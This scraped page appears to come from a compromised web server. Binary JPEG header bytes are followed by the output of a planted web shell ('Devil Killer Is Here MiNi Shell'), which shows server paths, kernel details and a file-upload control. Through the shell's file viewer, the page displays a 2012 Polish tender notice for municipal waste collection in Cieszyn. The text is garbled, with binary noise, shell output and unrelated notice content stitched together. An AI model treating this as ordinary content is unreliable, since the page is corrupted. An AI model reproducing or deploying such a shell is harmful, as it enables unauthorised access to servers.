JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20121108/440276-N-2012.html

<p class="kh_header"><b>Cieszyn: przedmiotem zamówienia są usługi odbioru i wywozu odpadów komunalnych z nieruchomości zarządzanych przez Zakład Budynków Miejskich w Cieszynie Sp. z o.o.</b><br>
<b>Numer ogłoszenia: 440276 - 2012; data zamieszczenia: 08.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Budynków Miejskich w Cieszynie Sp. z o.o. , ul. Liburnia 2a, 43-400 Cieszyn, woj. śląskie, tel. 033 8523743, faks 033 8522560.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zbm.cieszyn.bip-gov.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z ograniczoną odpowiedzialnością.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> przedmiotem zamówienia są usługi odbioru i wywozu odpadów komunalnych z nieruchomości zarządzanych przez Zakład Budynków Miejskich w Cieszynie Sp. z o.o..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> przedmiotem zamówienia są usługi odbioru i wywozu odpadów komunalnych z nieruchomości zarządzanych przez Zakład Budynków Miejskich w Cieszynie Sp. z o.o. , 43-400 Cieszyn, ul. Liburnia 2a, zgodnie z załącznikiem nr 11a -  ADM Nr 11a i załącznikiem nr 11b -  ADM Nr 2 do SIWZ, określających lokalizację pojemników, ilość, częstotliwość opróżniania oraz dzień i przedział czasowy wywozu odpadów. Powyższe załączniki będą stanowić również załączniki  do umowy. 3.3 .Zakres usług przewidzianych do wykonania obejmuje : a) odbiór i wywóz do miejsc przeznaczenia ( miejsc utylizacji, składowania, powtórnego wykorzystania ) wszelkich odpadów komunalnych pochodzących z lokali mieszkalnych i lokali użytkowych stanowiących zasób Zamawiającego, gromadzonych w pojemnikach typu PA-1100, SM-110, SM-55 ( własność Zamawiającego ) oraz wokół tych pojemników, zlokalizowanych na placach gospodarczych, klatkach schodowych lub piwnicach nieruchomości wskazanych w załączniku nr 11a i 11b do SIWZ. Dotyczy to odpadów komunalnych z katalogu 20 03 01,  zgodnie z Rozporządzeniem Ministra Środowiska z dnia 27 września 2001 roku w sprawie katalogu odpadów ( Dz. U. Nr 112, poz. 1206 z 2001 r. ). Poprzez teren wokół pojemników Zamawiający rozumie teren  w promieniu ok. 2 m od pojemników, b) odbiór i wywóz odpadów komunalnych pochodzących z selektywnej zbiórki i segregacji odpadów z lokali mieszkalnych i lokali użytkowych stanowiących zasób Zamawiającego, gromadzonych w workach kolorowych ( dostarczanych przez Wykonawcę ) przeznaczonych do zbiórki odpadów komunalnych segregowanych, zlokalizowanych na placach gospodarczych, klatkach schodowych lub piwnicach nieruchomości wskazanych w załączniku nr 11a i 11b do SIWZ. Dotyczy to odpadów komunalnych segregowanych i gromadzonych selektywnie z katalogu  15 01,  zgodnie  z Rozporządzeniem Ministra Środowiska z dnia 27 września 2001 roku w sprawie katalogu odpadów ( Dz. U. Nr 112, poz. 1206 z 2001 r. ). Dotyczy to worków na : papier, plastik, szkło białe, szkło kolorowe, metal. W razie wystąpienia takiej konieczności, dodatkowy wywóz worków z odpadami segregowanymi będzie odbywał się na podstawie telefonicznego zgłoszenia Zamawiającego, c) dostarczanie do siedziby ADM Nr 1 - 43-400 Cieszyn, ul. Śrutarska 39 i siedziby ADM Nr 2 - 43-400 Cieszyn, ul. Tysiąclecia 9c worków kolorowych przeznaczonych do zbiórki odpadów komunalnych segregowanych na papier, plastik, szkło białe, szkło kolorowe i złom, d) odstawienie opróżnionych pojemników na miejsce ich lokalizacji, e) uprzątnięcie odpadów luzem, które wysypały się podczas ładowania lub w wyniku opóźnionego wywozu czy przepełnienia pojemnika, f) pozostawienie porządku na placach gospodarczych, drogach komunikacyjnych służących do transportu pojemników;g) wymianę na własny koszt pojemnika, który został zniszczony z winy Wykonawcy, h) naprawę na własny koszt ewentualnych szkód powstałych z winy Wykonawcy w czasie transportu pojemników z miejsca ich lokalizacji  do miejsca opróżnienia i z powrotem (np. uszkodzenia ścian, schodów, drzwi wejściowych do nieruchomości). Szczegółowe uzgodnienia zawarte we wzorze umowy, j) usługa powinna być wykonana zgodnie z aktualnie obowiązującymi przepisami prawa oraz z uwzględnieniem wszystkich zmian zachodzących w trakcie realizacji umowy, w szczególności zgodnie z :ustawą z dnia 14 września 2010 r. o odpadach  (  Dz. U. Nr 185 poz 1243 z 2010 r.  z późn. zm. ), ustawą z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska ( Dz. U. Nr 25 poz 150 z 2008 r. z późn. zm. ),
aktami wykonawczymi do wyżej wymienionych ustaw oraz innymi niż ww. aktami prawnymi regulującymi zasady postępowania z odpadami komunalnymi.
3.4. Wykonanie usług : a) Zamawiający żąda wskazania przez Wykonawcę, którą część zamówienia powierzy podwykonawcom. b) Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, jedynie w przypadkach określonych poniżej oraz określa następujące warunki zmian postanowień umowy :zmiana wysokości cen stosowanych w umowie może nastąpić w przypadku wejścia w życie nowych przepisów w zakresie podatku VAT lub wysokości opłat za korzystanie ze środowiska w rozumieniu ustawy   z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska ( tj. Dz. U. Nr 25 poz. 150 z 2008 r. ) - o wartość wprowadzonych zmian. Nowe ceny będą obowiązywać z dniem wejścia w życie odpowiednich opłat lub zmiany stawek podatku. w przypadku powstania Wspólnoty Mieszkaniowej w trakcie trwania umowy bądź wyłączenia budynku z zasobu zarządzanego przez Zamawiającego, Zamawiający będzie miał prawo do wyłączenia z zakresu umowy budynku, w którym powstała Wspólnota bądź nieruchomości wyłączonej z zasobu zarządzanego przez Zamawiającego; w przypadku stwierdzenia konieczności zmiany ilości pojemników ( zmniejszenie lub zwiększenie ich liczby ) lub zmiany częstotliwości wywozu odpadów ( zmniejszenie lub zwiększenie ilości wywozów ) może ulec zmianie harmonogram wywozu odpadów oraz wartość umowy. c) odbiór odpadów komunalnych będzie się odbywał jak dotychczas, tj. w obecności pracowników firm świadczących dla Zamawiającego usługę utrzymania czystości w budynkach i ich otoczeniu, które to firmy jednocześnie ułatwiają dostęp do miejsc składowania odpadów. Ustalenie zasad współpracy z firmami sprzątającymi należeć będzie do obowiązków Wykonawcy. Zamawiający nie będzie ponosił żadnych konsekwencji wynikających ze złej współpracy Wykonawcy z tymi firmami. Firmy świadczące dla Zamawiającego usługę utrzymania czystości w budynkach i ich otoczeniu w chwili zawarcia umowy :nieruchomości objęte załącznikiem nr 1 do umowy - ADM Nr 1: ŁAD-KOMPLEX, Spółka Jawna, Mariola i Piotr Kopocz, 44-200 Rybnik, ul. Energetyków 5,
nieruchomości objęte załącznikiem nr 2 do umowy - ADM Nr 2: F.H. Inter-Corp Arkadiusz Uramowski, 43-173 Łaziska Górne, ul. Wyrska 3G/7. Zamawiający powiadomi Wykonawcę o każdej zmianie firmy świadczącej dla niego usługę utrzymania czystości w trakcie trwania umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość zamówień uzupełniających dotyczących budynków i powierzchni włączanych do zasobu zarządzanego przez Zamawiającego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.31.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o zamówienie mogą ubiegać się Wykonawcy posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, to jest powinni posiadać - aktualne na dzień składania ofert wpis do rejestru działalności regulowanej w Gminie Cieszyn  ( Dz. U. z 2012 Nr 0, poz. 391 )</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o zamówienie mogą ubiegać się Wykonawcy dysponujący doświadczeniem zawodowym rozumianym jako zrealizowane w ciągu ostatnich trzech lat przed dniem wszczęcia postępowania, tj. dniem ukazania się ogłoszenia o niniejszym przetargu w Biuletynie Zamówień Publicznych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwóch podobnych zamówień z podaniem wartości, daty i miejsca wykonania. Za podobne będzie uznane wykonanie usługi odbioru i wywozu odpadów komunalnych z budynków mieszkalnych lub z budynków mieszkalnych i użytkowych o wartości zamówienia nie mniejszej niż 200.000,00 zł  brutto za okres realizacji zmówienia nie dłuższy niż 1 rok. Warunek ten będzie uznany za spełniony także w przypadku wykonywania takiej usługi u dwóch zamawiających ( nie więcej ) jednocześnie ( łączna wartość zamówienia nie mniejsza niż 200.000,00 zł brutto za okres realizacji nie dłuższy niż 1 rok )</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o zamówienie mogą ubiegać się Wykonawcy dysponujący co najmniej : a) 2 śmieciarki o pojemności min. 16 m3, b) 1 śmieciarka o pojemności do 6 m3, c) 1 samochód o podwyższonych burtach do odbioru odpadów segregowanych o pojemności min. 14 m3</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
</li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oferta Wykonawcy - załącznik nr 1. 2. Doświadczenie zawodowe ( wg punktu 6.2. SIWZ ) - załącznik nr 2. 3. Wykaz sprzętu technicznego - załącznik nr 8. 4. Wykaz podwykonawców - załącznik nr 9. 5. Parafowany Wzór umowy - załącznik nr 10.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana wysokości cen stosowanych w umowie może nastąpić w przypadku wejścia w życie nowych przepisów w zakresie podatku VAT lub wysokości opłat za korzystanie ze środowiska w rozumieniu ustawy   z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska ( tj. Dz. U. Nr 25 poz. 150 z 2008 r. ) - o wartość wprowadzonych zmian. Nowe ceny będą obowiązywać z dniem wejścia w życie odpowiednich opłat lub zmiany stawek podatku. 2. W przypadku powstania Wspólnoty Mieszkaniowej w trakcie trwania umowy bądź wyłączenia budynku z zasobu zarządzanego przez Zamawiającego, Zamawiający będzie miał prawo do wyłączenia z zakresu umowy budynku, w którym powstała Wspólnota bądź nieruchomości wyłączonej z zasobu zarządzanego przez Zamawiającego; 3. W przypadku stwierdzenia konieczności zmiany ilości pojemników ( zmniejszenie lub zwiększenie ich liczby ) lub zmiany częstotliwości wywozu odpadów ( zmniejszenie lub zwiększenie ilości wywozów ) może ulec zmianie harmonogram wywozu odpadów oraz wartość umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zbm.cieszyn.bip-gov.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Budynków Miejskich w Cieszynie Sp. z o.o., 43-400 Cieszyn, ul. Liburnia 2a..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.11.2012 godzina 10:00, miejsce: Zakład Budynków Miejskich w Cieszynie Sp. z o.o., 43-400 Cieszyn, ul. Liburnia 2a..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com